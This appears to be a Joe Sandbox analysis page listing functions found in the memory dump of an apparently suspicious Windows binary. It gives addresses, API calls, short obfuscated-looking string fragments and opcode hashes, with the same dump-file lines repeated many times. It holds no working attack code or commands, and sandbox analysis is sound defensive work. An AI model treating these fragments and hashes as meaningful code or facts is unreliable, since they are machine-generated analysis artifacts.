Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: <I$)$<I$)$@^
API String ID: 1029625771-935358343
Opcode ID: 7fccef61d520214b59b6ecce9e8e991f6755bbf9b7ef49187a986ea8cafcf18a
Instruction ID: 6c27fe8e1fe35673765158430f86fc27f86bfd2d4ba29b9a78b3db0bb973cba1
Opcode Fuzzy Hash: 7fccef61d520214b59b6ecce9e8e991f6755bbf9b7ef49187a986ea8cafcf18a
Instruction Fuzzy Hash: D6218E351083848FC300EF68E891B6AF7E4AB6A344F6A882CE1C5D7352D776D915CB66

Function 00DAFCA0 Relevance: 5.4, Strings: 4, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 00DAFCBE
VY^_, xrefs: 00DAFDFF
V, xrefs: 00DAFEDC
J|BJ, xrefs: 00DB000D

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: J|BJ$V$VY^_$t
API String ID: 0-3701112211
Opcode ID: 205cd29789d7db55a682231b7dfd5c0f3d6233988aa11d5021426d986a9a779c
Instruction ID: a4f21afa65bb089ed1b72df2c62fc0d837ebd35bc00836f4342f16640d9eb378
Opcode Fuzzy Hash: 205cd29789d7db55a682231b7dfd5c0f3d6233988aa11d5021426d986a9a779c
Instruction Fuzzy Hash: F4D176755083909BD315DF58849466FBFE1AF96B84F18886CF4CA8B212C336CD09DBA2

Function 00DAD110 Relevance: 1.7, APIs: 1, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00DAD2F1

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bade6e60f3061352cd6e191409660bdaaac8b4030a7094044da536a624028a8d
Instruction ID: 4c1ca54ac28ee16eedbbe5c8763c633d7540703adb4a4d6b0ec852495a0c0de5
Opcode Fuzzy Hash: bade6e60f3061352cd6e191409660bdaaac8b4030a7094044da536a624028a8d
Instruction Fuzzy Hash: 43413070409380ABD701AB68D184A2EFBF6EF92744F188C0CE5C59B612C33AD810CB7B

Function 00DE5700 Relevance: 1.6, APIs: 1, Instructions: 69
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00DE5784

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89cf24374e789f7ade3d69ec30623120b7dfa2e0adb1ff1de1802ce42c1fd8d3
Instruction ID: 3eb73d05cd6c4f79b2ff5c208823eb11d15f641caa742a15d66d4aaf5df6d7e1
Opcode Fuzzy Hash: 89cf24374e789f7ade3d69ec30623120b7dfa2e0adb1ff1de1802ce42c1fd8d3
Instruction Fuzzy Hash: 0D118C7191C280EBC701BF29E844A2BBBE6EF86754F058828E4C4DB315D335D961CBB2

Function 00DE5BB0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00DE973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00DE5BDE

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00DE695B Relevance: 1.4, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00DE69C5

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 30c1821611d541121ddd4b3a2f50c42454733588d652b53204c0ca4fd859c8da
Instruction ID: 6fab0f8b09d57be5150be12720d141ea3e5094f14ac1f74f7f16f63dd35a34e8
Opcode Fuzzy Hash: 30c1821611d541121ddd4b3a2f50c42454733588d652b53204c0ca4fd859c8da
Instruction Fuzzy Hash: 233198B09083419FD718EF16D89073AB7F2EF94384F58882CE5C697262E334D904CB66

Function 00DB049B Relevance: .3, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a0e79eb5a88285677fe1af952b09dc780b0721f68b1572ae32ee24ad3378dee
Instruction ID: 442a8d0f9f7ad148473dccccb992319b08e7b6a3b977423ba74972c65d2463f5
Opcode Fuzzy Hash: 6a0e79eb5a88285677fe1af952b09dc780b0721f68b1572ae32ee24ad3378dee
Instruction Fuzzy Hash: F3914675200B40CFD7249F25E894A27B7F6FF89314B158A6CE896CBBA1D731E815CB60

Function 00DB0228 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd18621640bac6519fc707a078df1dab2aef115fe8e47ce71e8f8ece1d877d0
Instruction ID: 3b40b766855e5242870d9a6f1706818931a917567f7b75704e9da1f6ef6b8143
Opcode Fuzzy Hash: dcd18621640bac6519fc707a078df1dab2aef115fe8e47ce71e8f8ece1d877d0
Instruction Fuzzy Hash: 5E714775200B40DFD7249F25E894B27BBF6FF89314F148968E896CB662C731E815CB60

Function 00DE99D0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87ded20036001e761f92203bd81c9935baeab4a59ef0d1429e9d457a9d01ec16
Instruction ID: 530dc4970ab366b1b93a515b7ad9a17ad3576194ab986a544afde50753a3c6cc
Opcode Fuzzy Hash: 87ded20036001e761f92203bd81c9935baeab4a59ef0d1429e9d457a9d01ec16
Instruction Fuzzy Hash: 7E418034609380ABD724EB16E8A0B2BF7E6EF85714F58882CF58997251D331EC01CB72

Function 00DE63B8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c228eaebff6c0d6176fc6afaea35e7f2a4acc2e27f8c608159b1d8b2de49e90
Instruction ID: 30333d9c418745c454541a18ea4eb176d148fbdb66310ece0d928369db120e9f
Opcode Fuzzy Hash: 2c228eaebff6c0d6176fc6afaea35e7f2a4acc2e27f8c608159b1d8b2de49e90
Instruction Fuzzy Hash: 8631F570609341BADA24EB06DD81F3AB7A1EB90B94F68850CF2C1972D1D370E810CB72

Function 00DB0EEC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4977e1930442ed93c226d28f2cbc046e0a00a420d4cfcb0849e38dd9c463faf1
Instruction ID: bce38d167215205ffce24227f33d3418ce31c9594cfaa8408a48fbc33cea618b
Opcode Fuzzy Hash: 4977e1930442ed93c226d28f2cbc046e0a00a420d4cfcb0849e38dd9c463faf1
Instruction Fuzzy Hash: BF2105B4A0025ADBEB15CF94CC90BBEBBB1FF4A304F144848E412BB292C735A901CB64

Function 00DE3220 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00DE32A6

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 267be2e7633a91c81e9f52cdf646c1d9deb014f58fdbde9ebf0a0d80bc8a9dfe
Instruction ID: 1037aafbd411c3e03c38248de509b0578c57352e1336ba7686ea732c96ef6464
Opcode Fuzzy Hash: 267be2e7633a91c81e9f52cdf646c1d9deb014f58fdbde9ebf0a0d80bc8a9dfe
Instruction Fuzzy Hash: B7014B3450D380DBC701EB18E849A2ABBE9EF4A700F06881CE5C58B361D235ED60DBA6

Function 00DE3202 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00DE3208

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 167b0a63645faf240c33b8657f900381245cfad8de88c1ee815d75b7ecdbc99e
Instruction ID: 1fde712a8e8513d2489e055541c6a453c77eced445cb75d670487453e15a9323
Opcode Fuzzy Hash: 167b0a63645faf240c33b8657f900381245cfad8de88c1ee815d75b7ecdbc99e
Instruction Fuzzy Hash: B1B012300401005FDA042B00EC0AF103512EB00605F900050A101481B1D16258A4C564

Non-executed Functions

Function 00DBDB6F Relevance: 32.0, Strings: 24, Instructions: 2006COMMON

Download Yara Rule

Strings

mjkh, xrefs: 00DBE7D8
WP, xrefs: 00DBDCEF
LKJI, xrefs: 00DBE6E6
xgfe, xrefs: 00DBE71D
dcba, xrefs: 00DBE728
:WUE, xrefs: 00DBF6B7, 00DBF6C6
tuJK, xrefs: 00DBE967
DCBA, xrefs: 00DBE887, 00DBE896
QNOL, xrefs: 00DBE775
<=:;, xrefs: 00DBE930
`onm, xrefs: 00DBE733
AR, xrefs: 00DBDD10
89>?, xrefs: 00DBE9F6
%*+(, xrefs: 00DBDE37, 00DBDE46
|, xrefs: 00DBECB1
89&', xrefs: 00DBE93B
`Y^_, xrefs: 00DBE99E
()./, xrefs: 00DBE9CA
<=2, xrefs: 00DBEA01
lkji, xrefs: 00DBE73E
tsrq, xrefs: 00DBE6FC
@ONM, xrefs: 00DBE6DB
T, xrefs: 00DBF157
D, xrefs: 00DBE846

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
API String ID: 2994545307-1418943773
Opcode ID: c5a8f8625653e4c4276cd938c0da6e25dfd4c278d03aeb09208b6da5c8d29772
Instruction ID: 7452b6dc3c789f3b836ffacf5dccbbe847805668eb3e54fb522425cc735305d2
Opcode Fuzzy Hash: c5a8f8625653e4c4276cd938c0da6e25dfd4c278d03aeb09208b6da5c8d29772
Instruction Fuzzy Hash: DEF256B4509381DBD770DF14C884BEBBBE6AFD5344F58482CE4CA8B251DB719984CBA2

Function 00DD23E0 Relevance: 31.3, APIs: 4, Strings: 12, Instructions: 3298COMMON

Download Yara Rule

Strings

Cx, xrefs: 00DD453D
|}&C, xrefs: 00DD2F21
:, xrefs: 00DD32DD
fedc, xrefs: 00DD2782
{l`~, xrefs: 00DD268C
3<, xrefs: 00DD32D6
%*+(, xrefs: 00DD40EF
mlc@, xrefs: 00DD275C
`tii, xrefs: 00DD2693
f@~!, xrefs: 00DD25FF
ggxz, xrefs: 00DD2685
aenQ, xrefs: 00DD276A

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346107800.00000000010B3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1346272225.0000000001252000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_da0000_file.jbxd

Similarity

API ID:
String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C
API String ID: 0-786070067
Opcode ID: f0178e7c07bf460b6519ee2a1b95ee53cfb4fe97e79f552834129c389807b678
Instruction ID: eec4b1a7d7b32d1732df009b1da21ecd1177762423f26d707c644fefe8029e47
Opcode Fuzzy Hash: f0178e7c07bf460b6519ee2a1b95ee53cfb4fe97e79f552834129c389807b678
Instruction Fuzzy Hash: 3E33AC70504B818FD7258F39C590762BBE1FF16304F58899EE4DA8BB92C735E906CBA1

Function 00DC9F62 Relevance: 21.7, Strings: 17, Instructions: 473COMMON

Download Yara Rule

Strings

?m,o, xrefs: 00DCA13C
N[, xrefs: 00DCA375
/), xrefs: 00DCA66D
(a*c, xrefs: 00DCA147
=], xrefs: 00DCA36A
sm, xrefs: 00DCA830
WQ, xrefs: 00DCA62B
%e6g, xrefs: 00DCA152
CG, xrefs: 00DCAA32
WH, xrefs: 00DCAA1C
Gt, xrefs: 00DC9FF8
S], xrefs: 00DCA636
]{, xrefs: 00DCA1E7, 00DCA1F3
JG, xrefs: 00DCAA27
_Y, xrefs: 00DCA641
kW, xrefs: 00DCA380
hi, xrefs: 00DCAB9D

Memory Dump Source

Source File: 00000003.00000002.1345587604.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true

Associated: 00000003.00000002.1345562055.0000000000DA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.0000000001070000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1345636481.00000000010A3000.00000040.00000001.01000000.00000003.sdmpDownload File
